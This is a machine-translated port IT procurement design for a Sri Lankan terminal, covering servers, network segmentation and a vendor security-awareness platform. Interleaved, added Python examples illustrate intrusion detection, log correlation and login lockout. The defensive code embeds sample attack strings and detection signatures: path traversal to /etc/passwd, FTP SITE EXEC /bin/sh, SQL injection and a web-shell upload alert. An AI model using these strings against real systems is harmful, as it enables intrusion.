This is a bilingual snapshot page saved by the user at 2024-10-28 20:57 for https://app.immersivetranslate.com/word/, provided with bilingual support by Immersive Translate.


Basic Design Concept


Project Overview


Construction objectives, construction content and construction period


The construction objectives of this project are the construction of CTOS system-related servers, terminals, networks and supporting security equipment, so as to improve the operational efficiency of Sri Lanka terminals through informatization and strengthen the information security monitoring and early-warning capacity of Sri Lanka terminal units. The main purpose of this project is to solve the problems of weak information security monitoring and early-warning capability of the Sri Lankan terminal network and of a single source of data, to further improve the monitoring and early-warning capability for network emergencies, and to realize closed-loop management of monitoring, early warning, notification, rectification, feedback and analysis of overall network security risks.


Through the deployment of a monitoring management platform, network security monitoring probes, etc., the project aims to achieve effective discovery of unknown threat attacks, upgrading from local security to global security, from single-point warning to collaborative warning, and from fuzzy management to quantitative management.


The main construction elements of this project are:


CTOS server construction;


CTOS system supporting terminal construction;


Security awareness platform, WAF firewall, load balancing construction;


CTOS supporting network construction;


Delivery time: 30 natural days from the date of entry into force of the contract;


On-site implementation duration: within 45 natural days after the arrival of the goods, complete the deployment and implementation of the system in accordance with the implementation requirements of the procurement requirements;


Demand Analysis


Server Equipment


2 servers will be used as database servers; Oracle Database and Data Guard should run on these servers as the production database and disaster recovery system.


Windows Server 2019 English Standard Edition (6 sets) and Red Hat Enterprise Linux OEM (2 sets) are required for the servers.


2 sets of access switches (48 GE RJ45 ports, 4 SFP+ ports) to act as server connections.


Availability: All hardware and software products provided must be mature, widely available and state-of-the-art. The system shall consist of mature products and technologies that are not in the nature of a pilot system, and these products and technologies shall have users with successful applications. The system shall be state-of-the-art and robust for this phase and be provided with an application assurance license for five or more years.


Openness: The system's design specifications, technical specifications and products shall all comply with international and industry standards for open systems, with the ability to support a wide range of products. All products used in the system must comply with relevant international and national standards; the system shall be open and compatible, so that different systems can be interconnected.


High efficiency: The server must have strong real-time processing capabilities to meet the needs of the terminal's production applications and should provide fast response and high throughput for end users' business transactions, whether in a relatively idle state or during peak traffic.


Scalability: The servers and storage systems procured need to be more than twice as scalable, both vertically and horizontally, to support system upgrades while protecting the original investment.


High reliability: Individual devices must be highly reliable. If a single point of failure occurs in the core equipment, operation should be switched to the disaster recovery environment in a timely manner. The entire system must be highly fault-tolerant and must have a detailed redundant backup program.


Integrity: Contractors must ensure the integrity of the system design, that the hardware and software versions of the system are fully compatible, and that each part (component) of the system ensures the normal and stable operation of the entire system.


Stability: The system design should identify the necessary protective measures and present the relevant site and environmental requirements, to ensure that in the event of a power outage or momentary power loss the performance of the hardware and software will not be affected in any way. The hardware should be protected against overload, voltage rise and current increase, and should have a certain tolerance for any non-control operation.


The system must provide fault monitoring and diagnostic tools for both hardware devices and system software.


Wireless Devices


In order to realize information management of on-site loading and unloading operations at the container terminal, quay cranes, rubber-tyred gantry cranes, ITVs, on-site handheld terminals and other wireless devices need to access the employer's backbone network through the public LTE network system.


Holding terminals and other auxiliary equipment.


Carrier terminals and other auxiliary equipment.


This project requires the contractor to provide ancillary software such as device drivers and software.


The contractor is responsible for completing the design, integration, installation, debugging, system tuning, security control, interconnection with the wired network, connection with the production system and application testing, performance tuning and full acceptance check until the system is in normal production operation.


Development of various technical training programs and provision of comprehensive training on the installation, operation, management and maintenance of wireless terminal equipment.


Throughout the course of the project, the contractor must provide various technical documents in English conforming to Sri Lankan national standards and internationally recognized standards.


Procurement, construction, delivery, assembly, installation, testing, commissioning, system tuning and handover of the following:


(a) 15 sets of hand-held terminals


(b) 5 sets of HHT multi-chargers


(c) 26 sets of RTG/RMG terminals


(d) 35 sets of VMT terminals


HIPG Cybersecurity Construction


Establish a comprehensive port network security system, improve network availability, protection and emergency response capabilities, and ensure the safe and stable operation of port information systems. At present, HIPG has 2 core switches: one is located in the Administration Building (primary data center) and the other in the Engineering Operation Building (backup data center), in a star network architecture with dual switches. The core switch of the backup data center is connected to the core switch of the administration building in Layer 3 routing mode. The core switch in the backup data center is mainly used for office network access in the Work Building, Marline Building and Shop Building. The core switch in the administration building is primarily used for servers and office network access in the administration building. The two core switches are connected to different systems through VLANs. There are 2 firewalls connected to the core switch in the administration building and 2 firewalls connected to the core switch, with a dedicated line to the Internet.


With the development of the network, the Internet has gradually become an indispensable part of people's lives, but information security problems are growing more and more critical with it. In recent years, information security has become a hotspot for industry attention and discussion. Currently, traditional cybersecurity threats such as Trojan horses, botnets and phishing sites continue unabated, while new types of cyberattacks such as Distributed Denial of Service (DDoS) attacks and Advanced Persistent Threats (APT attacks) are intensifying.


In the face of today's increasingly serious security situation, traditional security systems also face huge challenges. Data shows that more than 100,000 organizations have suffered data breaches, including nearly half of the Fortune 500, and security incidents have led numerous executives to resign from their companies. This is due to APT (advanced persistent threat) attacks: with their unique attack methods and means, traditional security defense tools are no longer sufficient for effective defense. An APT attack is not a single technique but an integration of many intrusion and penetration techniques into a stealthy attack that can, over a long period of time, gradually complete tasks such as breaking in, penetrating, eavesdropping and stealing data; it embodies two characteristics, "targeted" and "persistent".


The main target industries of APT attacks are government, military, financial institutions, telecommunications and other industries. The main way in is through email, social networking sites, system vulnerabilities, viruses and a range of other means of intruding into user computers. Enterprises cannot defend against APT attacks mostly because they cannot detect how and by what means the APT attack is carried out: because an APT attack is an unknown threat, its attack route and channel cannot be determined; it has strong stealth and persistence and can lurk in computers for a long time without being detected.


Not counting the process of preliminary reconnaissance and information gathering, it takes an attacker only a few hours from the start of execution to compromise, whereas more than 84 percent of organizations take weeks or even more than a month to discover a hacker attack, followed by days to weeks to complete response and disposition work.


Traditional defenses rely on firewall technology, intrusion detection technology and antivirus technology; any user facing a security problem for the first time usually considers these three, and the traditional defense consists of these three. Although they have played a great role, they still face many new problems.


First of all, although users' systems have deployed firewalls, they still cannot avoid worm floods, spam, viruses and denial-of-service attacks. Intrusion detection, as individual products not deployed at scale, has inherent shortcomings in early warning, and there is still a lot of room for improvement in precise targeting and global management.


Secondly, although many users have installed antivirus products on standalone computers and endpoints, intranet security is not just a matter of antivirus; it also includes enforcement of security policies, external intrusion, patch management and compliance management.


So, although traditional defenses still play an important role, users have gradually felt their inadequacy, because they are no longer able to detect and defend against new types of attacks. Simply put, cyberattack technology has outpaced the defense techniques used by most organizations today.


Construction program


Design Principles


The entire system should utilize the most mature and advanced technologies from various industries, such as IT network management, container operation management, shipping and logistics management, vessel traffic management, etc. These systems must be recognized as industry-leading products.


Efficiency: Ensures uninterrupted high operational performance of containerized operations under high loads 24/7/365.


High reliability: Redundant components and functions should be designed for the entire system and must be very comprehensive and complete.


High security: As Internet-based open system technology and distributed information technology have greater flexibility and scalability, information security has become one of the important factors that cannot be ignored. There must be a strict and effective security mechanism to control and manage the system. How to ensure the stability and reliability of the system, maintain network security, and prevent hacker attacks and computer virus invasion is an integral part of system security that cannot be ignored.


Manageability and Maintainability: In a complex network and system environment, a high degree of manageability has become the key to system success. The system is designed with full consideration of using advanced system management software for daily monitoring, backup, setting thresholds and handling controllable events to ensure the reliability of the management system.


Scalability: In the rapidly developing information field, the application environment, hardware and software will be constantly updated, and the equipment system needs to fully consider the protection of current end-use investment. The development of the enterprise depends on the scalability, consistency and compatibility of the system.


Construction content


Hardware and software for production servers and other related accessory equipment


Equipment drivers, software and other related programs


Provide complete system design documents, installation screen records and configuration manuals, etc., as required by the technical specifications.


Responsible for site investigation, analysis, design, equipment procurement, installation, system commissioning, rollout, technical support and services for the entire system and ensuring network connectivity.


Prepare a technical training program and provide comprehensive training on the installation, operation, management and maintenance of the entire system.


Free 3-year warranty on all servers and 1-year warranty on all other equipment.


Security Sensing System


Improving network partitioning will require us to migrate the production network from the core switches in the administration building to two additional core switches that are dedicated to the production network. In addition, we will use two newly added firewalls to segregate the production network from the office network and provide four production network access switches.


The additional core switches, access switches and firewalls will be deployed in high availability mode.


Add two WAF (Web Application Firewall) appliances for enhanced protection of internal web applications, deployed in high-availability mode.


Add two load balancing devices to the production network to improve the high availability of business systems, deployed in high-availability mode.


Create a new security operations and maintenance zone (VLAN) on the core switch in the primary data center. Two privileged access management systems (bastion hosts) are deployed in the security operations and maintenance zone to manage and maintain applications, databases, servers and network devices, and to provide operation log auditing, deployed in high-availability mode.


A situational awareness platform is deployed in the security operations and maintenance area to monitor border traffic between the Internet and the production network. The platform visualizes the state of network security so that threats can be quickly detected and responded to in a timely manner.


Deploy enterprise antivirus software suite in secure operations and maintenance areas.


System Architecture


The latent threat probes, the whole-network security perception visualization platform and the security services cloud platform together constitute a technical architecture of continuous detection and rapid response:


Figure 4-1 System Architecture of Security Awareness Platform


Subliminal Threat Agent (STA): Subliminal Threat Agents (STAs) are deployed at the core switching layer and in the internal security domain. Based on captured network traffic, they identify user access to business assets and business relationships, and perform preliminary attack identification, violation detection and intranet anomalous behavior identification. Probes are deployed in bypass mode, which is simple to implement and does not affect the original network structure at all, reducing the incidence of single-point network failure. The probe obtains a "copy" of the data in the link, which is mainly used to listen to and detect the data flow in the LAN and the network behavior of users or servers, as well as to collect the TCP behavior of users or servers.


Security Awareness Platform (SIP): A security awareness platform is deployed on the intranet as a whole-network inspection system that collects data from the security detection probes at each node and presents users, through visualization, with intranet business assets and the attacks and potential threats against critical intranet business assets; it also provides unified management and policy issuance for all security systems on the existing network through this platform.


Component Implementation


The network-wide security awareness platform is mainly composed of two parts, threat latent probes and the security awareness system, while supporting seamless interfacing with other security devices and providing in-depth analysis, threat correlation and service response capabilities based on the Security Service Cloud. Built on a 64-bit, multi-core, concurrent, high-speed hardware platform, the threat probe uses a self-developed parallel operating system (Sangfor OS) to run the forwarding plane and the security plane in parallel on a multi-core platform, with multi-plane concurrent processing and close collaboration, greatly improving the performance of secure processing of network packets. The security awareness system utilizes big data parallel computing frameworks to support correlation analysis, traffic detection, machine learning and other computational detection modules, thus realizing a full range of detection services in collaboration with massive data analysis.


Latent Threat Probe


Separated Plane Design


Threat Lurking Probe separates the data processing of the network layer and the application layer by software design. Based on the application recognition module in the bottom layer, it recognizes all data received by the NICs and then passes the application data messages that need processing to the application layer through a packet-grabbing driver. If data processing fails in the application layer, the forwarding of data in the network layer is not affected, thus realizing efficient and reliable data message processing.


Multi-core Parallel Processing


The design of Threat Lurking Probe not only adopts a multi-core hardware architecture but also advanced lock-free parallel processing technology in the design of its computational instructions, which realizes simultaneous multi-pipeline processing and exponentially increases system throughput; performance is excellent on a multi-core system, making it a real multi-core parallel processing architecture.


Single Resolution Architecture (SRA)


Threat Lurking Probe adopts a single-parsing architecture to realize one parse and one match per message, which effectively improves the efficiency of the application layer. One of the key elements of the single parsing technology is the software architecture design that separates the network layer and application layer planes: data is extracted to the application plane through "zero-copy" technology, so that threat characteristics are parsed and detected in a unified way, redundant packet encapsulation is reduced, and high-performance data processing is achieved.


Jump Scan Technology


Threat Lurking Probe utilizes the application identification technology accumulated over the years to tag all packets passing through the probe with an application, via a private protocol at the kernel driver level. When the packets are extracted to the content inspection plane, the device looks up the corresponding application threat features. By using jump scanning technology to skip irrelevant application threat detection features, it reduces ineffective scanning and improves scanning efficiency. For example, if the traffic is recognized as HTTP traffic, the vulnerability attack features for the Serv-U FTP server will not pose a threat to the system, so their detection can be skipped and the traffic forwarded, improving forwarding efficiency.
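The following is an added illustration of the jump-scan idea, not code from the page or from the probe vendor: packets arrive already tagged with an application label, signatures are indexed by the application they apply to, and only that application's rules (plus wildcard rules) are evaluated. The rule set, the application tags and the sample payloads are all constructed for this example.

```python
"""Added example: application-tagged signature selection ("jump scan").

Assumptions (not from the page): signatures are plain regexes grouped by the
application protocol they apply to, and each packet arrives already tagged with
an application label by an earlier identification step. Everything here is
constructed for illustration.
"""
import re
from dataclasses import dataclass, field


@dataclass
class Signature:
    sig_id: str
    app: str            # application the rule is relevant to ("*" = every app)
    pattern: re.Pattern


# Constructed rule set: FTP rules are irrelevant to HTTP traffic and vice versa.
SIGNATURES = [
    Signature("ftp-001", "ftp", re.compile(rb"^SITE\s+EXEC", re.M)),
    Signature("ftp-002", "ftp", re.compile(rb"^MKD\s+A{200,}", re.M)),
    Signature("http-001", "http", re.compile(rb"\.\./\.\./")),
    Signature("http-002", "http", re.compile(rb"(?i)<script")),
    Signature("any-001", "*", re.compile(rb"\x90{16,}")),  # NOP sled, any app
]

# Index rules by application once, so the per-packet lookup is a dict access.
RULES_BY_APP = {}
for s in SIGNATURES:
    RULES_BY_APP.setdefault(s.app, []).append(s)


@dataclass
class Packet:
    app: str        # application tag assigned at the driver level (constructed)
    payload: bytes


@dataclass
class ScanStats:
    matches: list = field(default_factory=list)
    rules_evaluated: int = 0


def full_scan(pkt: Packet, stats: ScanStats) -> list:
    """Baseline: every rule is tried against every packet."""
    hits = []
    for s in SIGNATURES:
        stats.rules_evaluated += 1
        if s.pattern.search(pkt.payload):
            hits.append(s.sig_id)
    stats.matches.extend(hits)
    return hits


def jump_scan(pkt: Packet, stats: ScanStats) -> list:
    """Jump scan: only rules for the packet's application, plus wildcard rules."""
    hits = []
    candidates = RULES_BY_APP.get(pkt.app, []) + RULES_BY_APP.get("*", [])
    for s in candidates:
        stats.rules_evaluated += 1
        if s.pattern.search(pkt.payload):
            hits.append(s.sig_id)
    stats.matches.extend(hits)
    return hits


# Constructed sample traffic: one directory traversal, one FTP SITE EXEC, one benign.
SAMPLE = [
    Packet("http", b"GET /../../etc/passwd HTTP/1.1\r\nHost: x\r\n"),
    Packet("ftp", b"USER anonymous\r\nSITE EXEC /bin/sh\r\n"),
    Packet("http", b"GET /index.html HTTP/1.1\r\n"),
]


def compare(packets=SAMPLE) -> dict:
    """Run both strategies: identical hits, fewer rule evaluations with jump scan."""
    full, jump = ScanStats(), ScanStats()
    for p in packets:
        full_scan(p, full)
        jump_scan(p, jump)
    return {
        "full_hits": sorted(full.matches), "full_rules": full.rules_evaluated,
        "jump_hits": sorted(jump.matches), "jump_rules": jump.rules_evaluated,
    }


if __name__ == "__main__":
    print(compare())
```

The saving depends entirely on the application tag being right: a packet that is mis-identified (or carries a protocol tunnelled inside another) is checked against the wrong rule subset, which is why wildcard rules and protocol anomaly detection still have to run on every packet.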


Flow Records


It can restore and record network communication behavior for security personnel to conduct forensic analysis. Restored content includes: TCP session records, web access records, SQL access records, DNS resolution records, file transfer behavior and LDAP login behavior.


Message Detection Engine


It can realize IP fragment reassembly, TCP stream reassembly, application-layer protocol identification and parsing, etc. It has various intrusion attack patterns and malicious URL monitoring patterns, can complete pattern matching and generate events, can extract URL records and domain name records, and can record the original messages based on the five-tuple and the IP pair when a characteristic event is triggered.
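Why stream reassembly matters before pattern matching, as an added example that is not the engine's own code: segments of one flow are collected by five-tuple, ordered by sequence number (with a retransmitted segment dropped and a gap refused), and the signature is matched on the rebuilt stream. The segments, the five-tuple key and the signature are constructed for this example.

```python
"""Added example: TCP stream reassembly keyed by the five-tuple, followed by
pattern matching over the reassembled stream. Segments, key and signature are
constructed for illustration; none of this is the page's own code.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Segment:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str
    seq: int
    data: bytes

    @property
    def five_tuple(self):
        return (self.src, self.sport, self.dst, self.dport, self.proto)


class StreamReassembler:
    """Orders segments per flow by sequence number and rebuilds the byte stream.
    A retransmission of an already-seen segment is ignored; an overlap keeps the
    first copy of each byte; a gap stops reconstruction at the missing byte."""

    def __init__(self):
        self.flows = defaultdict(dict)  # five_tuple -> {seq: data}

    def add(self, seg: Segment):
        self.flows[seg.five_tuple].setdefault(seg.seq, seg.data)

    def stream(self, key) -> bytes:
        out = bytearray()
        expected = None
        for seq in sorted(self.flows[key]):
            data = self.flows[key][seq]
            if expected is None:
                expected = seq
            if seq < expected:              # overlap: drop bytes already emitted
                data = data[expected - seq:]
                seq = expected
            if seq > expected:              # gap: nothing trustworthy beyond here
                break
            out += data
            expected = seq + len(data)
        return bytes(out)


# Constructed signature: a SQL-injection-style keyword pair in a URL.
SIGNATURE = re.compile(rb"(?i)union(?:\s|%20)+select")


def scan_segments_only(segments) -> list:
    """Naive per-segment matching: misses a pattern split across segments."""
    return [s.seq for s in segments if SIGNATURE.search(s.data)]


def scan_reassembled(segments) -> dict:
    """Reassemble per five-tuple, then match. Returns {five_tuple: matched bytes}
    so the event can be recorded with its flow and IP pair, as the text describes."""
    r = StreamReassembler()
    for s in segments:
        r.add(s)
    events = {}
    for key in r.flows:
        m = SIGNATURE.search(r.stream(key))
        if m:
            events[key] = m.group(0)
    return events


def ip_pair(key):
    """Reduce a five-tuple to the (src, dst) IP pair used for per-pair recording."""
    return (key[0], key[2])


# Constructed segments, delivered out of order, with the keyword split in two
# and one retransmission (the same seq twice).
KEY = ("10.0.0.5", 51000, "10.0.0.20", 80, "tcp")
SEGMENTS = [
    Segment(*KEY, seq=1000, data=b"GET /item?id=1%20UNI"),
    Segment(*KEY, seq=1028, data=b"ECT%20password%20FROM%20users HTTP/1.1\r\n"),
    Segment(*KEY, seq=1020, data=b"ON%20SEL"),
    Segment(*KEY, seq=1020, data=b"ON%20SEL"),
]

if __name__ == "__main__":
    print("per-segment hits:", scan_segments_only(SEGMENTS))
    print("reassembled hits:", scan_reassembled(SEGMENTS))
```

Per-segment matching reports nothing on this input, while the reassembled stream yields one event for the flow; the same reasoning applies to IP fragment reassembly one layer down.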


Sangfor Regex Regular Engine


Regular expressions are a method of recognizing specific patterns in data that can accurately identify attacks in a network. Security experts have found that the matching speed of regular expression engines already available in the industry is generally slow, which restricts the improvement of the overall speed of the probes. To this end, a new Sangfor Regex regular engine has been designed and implemented, which raises regular expression matching speed to dozens of Gbps, tens of times faster than well-known engines such as PCRE and Google's RE2, reaching an industry-leading level.


Threat Latent Probe's Sangfor Regex drastically reduces CPU utilization and effectively improves Threat Latent Probe's throughput, enabling higher-speed processing of customer business data. This technology is especially suitable for scenarios with particularly high throughput-per-second requirements, such as carriers and e-commerce companies.


Security Awareness Platform


Asset operations management


According to functional division, intranet devices can be categorized into assets and services. The security awareness platform can actively identify intranet assets and discover the IP addresses of undefined equipment assets in the intranet, eliminating the need for users to perform tedious statistics and manual entry and saving them time. The asset configuration details display module can identify the IP addresses, operating systems, open ports, and the protocols and applications used in transmission of the intranet server assets. The business-asset relationship display module can combine assets into specific business groups by asset IP address or address segment.
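An added example, not the platform's own logic, covering both the flow records described under "Flow Records" above and the passive asset discovery described here: packet summaries are grouped into TCP session, DNS, web and SQL records, hosts that answer a SYN with SYN/ACK are recorded as server assets with their open ports and observed protocols, and assets are then grouped into business groups by address segment. The packet summaries, the application tags and the group-to-CIDR mapping are all constructed.

```python
"""Added example: flow records and passive asset discovery from observed packets.
All packets, tags and group definitions are constructed; this is not the
page's or the vendor's code.
"""
import ipaddress
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Pkt:
    ts: float
    proto: str        # "tcp" or "udp"
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False
    ack: bool = False
    app: str = ""     # "dns", "http", "sql": constructed application tag
    info: str = ""    # queried name, URL path or SQL statement


@dataclass
class Asset:
    ip: str
    open_ports: set = field(default_factory=set)
    protocols: set = field(default_factory=set)
    clients: set = field(default_factory=set)


def flow_records(packets) -> dict:
    """Group packets into the record types a forensic analyst would browse."""
    sessions, dns, web, sql = {}, [], [], []
    for p in sorted(packets, key=lambda x: x.ts):
        if p.proto == "tcp":
            key = (p.src, p.sport, p.dst, p.dport)
            if p.syn and not p.ack:          # client SYN opens a session record
                sessions[key] = {"start": p.ts, "end": p.ts,
                                 "server": p.dst, "port": p.dport}
            else:                            # either direction extends it
                s = sessions.get(key) or sessions.get((p.dst, p.dport, p.src, p.sport))
                if s:
                    s["end"] = max(s["end"], p.ts)
        if p.app == "dns":
            dns.append((p.src, p.info))
        elif p.app == "http":
            web.append((p.src, p.dst, p.info))
        elif p.app == "sql":
            sql.append((p.src, p.dst, p.info))
    return {"tcp_sessions": list(sessions.values()), "dns": dns, "web": web, "sql": sql}


def discover_assets(packets) -> dict:
    """A host answering SYN with SYN/ACK is a server asset: record the answering
    port as open, the peer as a client, and later application tags as protocols."""
    assets = {}
    for p in sorted(packets, key=lambda x: x.ts):
        if p.proto == "tcp" and p.syn and p.ack:
            a = assets.setdefault(p.src, Asset(p.src))
            a.open_ports.add(p.sport)
            a.clients.add(p.dst)
        if p.app and p.dst in assets:
            assets[p.dst].protocols.add(p.app)
    return assets


def business_groups(assets, groups) -> dict:
    """Map discovered assets into business groups by address segment.
    groups: {group name: [CIDR, ...]} (a constructed mapping)."""
    out = {g: [] for g in groups}
    for ip in sorted(assets):
        addr = ipaddress.ip_address(ip)
        for g, nets in groups.items():
            if any(addr in ipaddress.ip_network(n) for n in nets):
                out[g].append(ip)
    return out


# Constructed traffic: a client browsing a web server, a DNS lookup, and the web
# server talking to a database server on 1521.
PACKETS = [
    Pkt(1.0, "tcp", "10.1.1.10", 40000, "10.1.2.5", 80, syn=True),
    Pkt(1.1, "tcp", "10.1.2.5", 80, "10.1.1.10", 40000, syn=True, ack=True),
    Pkt(1.2, "tcp", "10.1.1.10", 40000, "10.1.2.5", 80, ack=True, app="http", info="/login"),
    Pkt(2.0, "udp", "10.1.1.10", 53001, "10.1.2.2", 53, app="dns", info="erp.internal"),
    Pkt(3.0, "tcp", "10.1.2.5", 45000, "10.1.2.9", 1521, syn=True),
    Pkt(3.1, "tcp", "10.1.2.9", 1521, "10.1.2.5", 45000, syn=True, ack=True),
    Pkt(3.5, "tcp", "10.1.2.5", 45000, "10.1.2.9", 1521, ack=True, app="sql", info="SELECT * FROM users"),
]
GROUPS = {"web": ["10.1.2.0/29"], "db": ["10.1.2.8/29"]}

if __name__ == "__main__":
    print(flow_records(PACKETS))
    print(business_groups(discover_assets(PACKETS), GROUPS))
```

Note that the DNS server at 10.1.2.2 is not discovered, because the SYN/ACK heuristic only sees TCP listeners; a UDP service needs a request/response heuristic of its own, which is one reason passive discovery is complemented by the manual asset entry the text mentions.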


Intranet Traffic Display


The access relationship display module learns access relationships to display the access relationships between users, business systems and the Internet; it can identify the who, what, when and how of each access relationship and uses color to distinguish users and business systems of different danger levels. Intranet access violations, attacks and abnormal traffic are displayed graphically: normal access, access violations, attacks and abnormal traffic of the intranet are shown for different business assets and distinguished with different colors, which is more intuitive for users.


Monitoring the identification knowledge base


The built-in detection and identification knowledge base of the security awareness platform covers more than 1,100 types of applications, with a total of more than 3,000 application identification rules, and has the ability to identify URLs on a scale of hundreds of millions; the knowledge base covers more than 4,000 intrusion protection vulnerability rules and features, and the intrusion protection vulnerability features have a Chinese-language introduction, including but not limited to the vulnerability description, vulnerability name, danger level, affected system, corresponding CVE number, reference information and suggested solutions; the knowledge base has an independent bot host identification feature library, and the total number of malware identification features is more than 500,000 items.


Log collection and correlation


The Security Awareness Platform can collect and analyze logs and alarms from the Next Generation Firewall (NGAF) and Endpoint Security System (EDR) and perform corresponding analysis and correlation. At the same time, for the security risks found by the platform's analysis, it can also quickly call these protection systems to block and kill the security risks and attack code in response.


For third-party security devices that support syslog, the platform also supports the collection, storage and query services of related logs.
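An added example of the collection and correlation step, not the platform's own code: syslog lines from a firewall and an endpoint agent are parsed into fields, a firewall alert aimed at a host is paired with an endpoint detection on that same host inside a time window, and the pairs that got through with `action=allow` are turned into block requests. The log lines, the `ngaf`/`edr` tags, the key=value layout and the device names are constructed; they are not real NGAF or EDR log formats.

```python
"""Added example: syslog parsing plus firewall/endpoint alert correlation.
Log lines, tags and field layout are constructed for illustration.
"""
import re
from datetime import datetime, timedelta

# Constructed RFC 3164-style lines: "<PRI>Mon dd HH:MM:SS host tag: key=value ..."
SAMPLE_LOGS = [
    "<134>Oct 28 20:10:01 fw-01 ngaf: event=ids_alert sig=web-shell-upload src=203.0.113.7 dst=10.1.2.5 action=allow",
    "<134>Oct 28 20:10:40 edr-mgr edr: event=malware host=10.1.2.5 file=/var/www/html/cmd.php verdict=quarantined",
    "<134>Oct 28 20:11:05 fw-01 ngaf: event=ids_alert sig=sql-injection src=203.0.113.9 dst=10.1.2.6 action=block",
    "<134>Oct 28 21:30:00 edr-mgr edr: event=malware host=10.1.2.6 file=/tmp/x.elf verdict=quarantined",
    "this line is not syslog at all",
]

SYSLOG_RE = re.compile(
    r"^<(?P<pri>\d+)>(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<tag>\w+): (?P<msg>.*)$"
)


def parse_syslog(line: str, year: int = 2024):
    """Return header fields plus key=value pairs, or None if the line does not parse.
    The year is assumed because RFC 3164 timestamps carry none."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(f"{year} {rec['ts']}", "%Y %b %d %H:%M:%S")
    rec["severity"] = int(rec["pri"]) % 8          # PRI = facility * 8 + severity
    rec.update(dict(kv.split("=", 1) for kv in rec["msg"].split() if "=" in kv))
    return rec


def correlate(lines, window=timedelta(minutes=10)) -> list:
    """Pair a firewall IDS alert aimed at a host with an EDR malware detection on
    that host within `window`: two independent sensors agreeing is far stronger
    evidence than either alert alone."""
    records = [r for r in (parse_syslog(l) for l in lines) if r]
    fw = [r for r in records if r["tag"] == "ngaf" and r.get("event") == "ids_alert"]
    edr = [r for r in records if r["tag"] == "edr" and r.get("event") == "malware"]
    incidents = []
    for f in fw:
        for e in edr:
            lag = e["time"] - f["time"]
            if e.get("host") == f.get("dst") and timedelta(0) <= lag <= window:
                incidents.append({
                    "host": f["dst"], "attacker": f["src"], "signature": f["sig"],
                    "file": e["file"], "fw_action": f["action"],
                    "lag_seconds": int(lag.total_seconds()),
                })
    return incidents


def response_actions(incidents) -> list:
    """Turn correlated incidents into the block requests the text says the
    platform hands back to the protection systems (constructed action format)."""
    actions = []
    for i in incidents:
        if i["fw_action"] != "block":
            actions.append(("firewall", "block_src", i["attacker"]))
        actions.append(("edr", "isolate_host", i["host"]))
    return actions


if __name__ == "__main__":
    for inc in correlate(SAMPLE_LOGS):
        print(inc)
    print(response_actions(correlate(SAMPLE_LOGS)))
```

On the sample data only the first pair correlates: the second firewall alert and the later EDR detection on 10.1.2.6 are 79 minutes apart, outside the window, so they stay separate alarms rather than being merged into one incident.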


Visualization Platform


The network-wide attack monitoring and visualization platform supports security situational awareness, map presentation and visualization of network-wide security events and attacks, with statistics and display by attack event, attack source, attack target, attack type and hazard level. The visualization platform supports network-wide business visualization, which can present a graphical display of the access relationships of network-wide business objects and of invaded business, and supports user-defined visualization of business asset management. It supports analyzing the traffic passing through the device and discovering the vulnerabilities of the protected object (non-active scanning). The business external connection monitoring large screen displays a real-time dynamic map of assets and business attacked from the external network in a graphical large-screen display. Branch security monitoring can display the security status of branches/supervised organizations in the form of map topology, rank their risk status and list their security trends. The security log display supports the summary of security logs of all security devices, and logs can be filtered by multiple conditions such as time, type, severity level, action, region, IP, user, feature/vulnerability ID, reply status code, domain name/URL and device name.


Big Data Analytics Engine


The Big Data Analysis Engine is responsible for realizing all kinds of detection capabilities and big data correlation analysis capabilities. The engine consists of data preprocessing, data fusion, model construction, model fusion, analysis result generation and other major modules, with MapReduce as the underlying computing framework and MLlib and TensorFlow as the main machine learning frameworks, implementing SVM, Bayesian networks, random forests, LDA, DGA, Markov clustering, iForest, RNN and other key machine learning algorithms to support security capabilities such as UEBA, compromised host detection and big data correlation analysis.


Management Function


The management function consists of several modules. The login module supports a user identity security authentication mode; after multiple login failures the account is locked and cannot log in for 5 minutes, and users can be forced to change their password on first login. The upgrade module supports two upgrade modes, online upgrade and offline upgrade, and supports automatic upgrade of the platform with unified control of probe upgrades. The user management module supports adding new users and managing users, and can control user access rights (permissions include read). The time management module supports time synchronization, including the NTP v4.0 protocol. The network management module provides network management functions and static routing configuration. The device management module monitors the device's CPU, memory and storage space usage in real time and can monitor the real-time traffic of the listening interface. The data management module can analyze statistics on the number of files restored and the size and distribution of the traffic of each application within a day or a week.
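The login-module behaviour described above (lockout for 5 minutes after repeated failures, forced password change on first login), as an added example that is not the platform's code. The page states the 5-minute lock but not the failure threshold, so a threshold of 5 is assumed; the in-memory user store, the PBKDF2 parameters and the injectable clock are likewise constructed for the example.

```python
"""Added example: login lockout and forced first-login password change.
LOCK_SECONDS comes from the document; MAX_FAILURES, the user store, the
PBKDF2 parameters and the clock injection are assumptions for this example.
"""
import hashlib
import hmac
import os
import time
from dataclasses import dataclass

LOCK_SECONDS = 5 * 60   # stated in the document: no login for 5 minutes
MAX_FAILURES = 5        # assumption: the page does not give the threshold


def _hash(password: str, salt: bytes) -> bytes:
    # PBKDF2-HMAC-SHA256; the iteration count is illustrative, not a recommendation
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


@dataclass
class User:
    name: str
    salt: bytes
    pw_hash: bytes
    must_change_password: bool = True   # forces a change on first successful login
    failures: int = 0
    locked_until: float = 0.0


class AuthService:
    def __init__(self, clock=time.time):
        self.users = {}
        self.clock = clock               # injectable so the lockout can be tested

    def add_user(self, name: str, password: str) -> None:
        salt = os.urandom(16)
        self.users[name] = User(name, salt, _hash(password, salt))

    def login(self, name: str, password: str) -> str:
        """Returns 'locked', 'failed', 'change_password' or 'ok'."""
        now = self.clock()
        user = self.users.get(name)
        if user is None:
            _hash(password, b"\0" * 16)  # same cost for unknown users (timing)
            return "failed"
        if now < user.locked_until:
            return "locked"              # no password check while locked
        if not hmac.compare_digest(_hash(password, user.salt), user.pw_hash):
            user.failures += 1
            if user.failures >= MAX_FAILURES:
                user.locked_until = now + LOCK_SECONDS
                user.failures = 0
                return "locked"
            return "failed"
        user.failures = 0                # success resets the counter
        return "change_password" if user.must_change_password else "ok"

    def change_password(self, name: str, old: str, new: str) -> bool:
        user = self.users[name]
        if not hmac.compare_digest(_hash(old, user.salt), user.pw_hash):
            return False
        user.salt = os.urandom(16)       # re-salt on every change
        user.pw_hash = _hash(new, user.salt)
        user.must_change_password = False
        user.failures = 0
        return True


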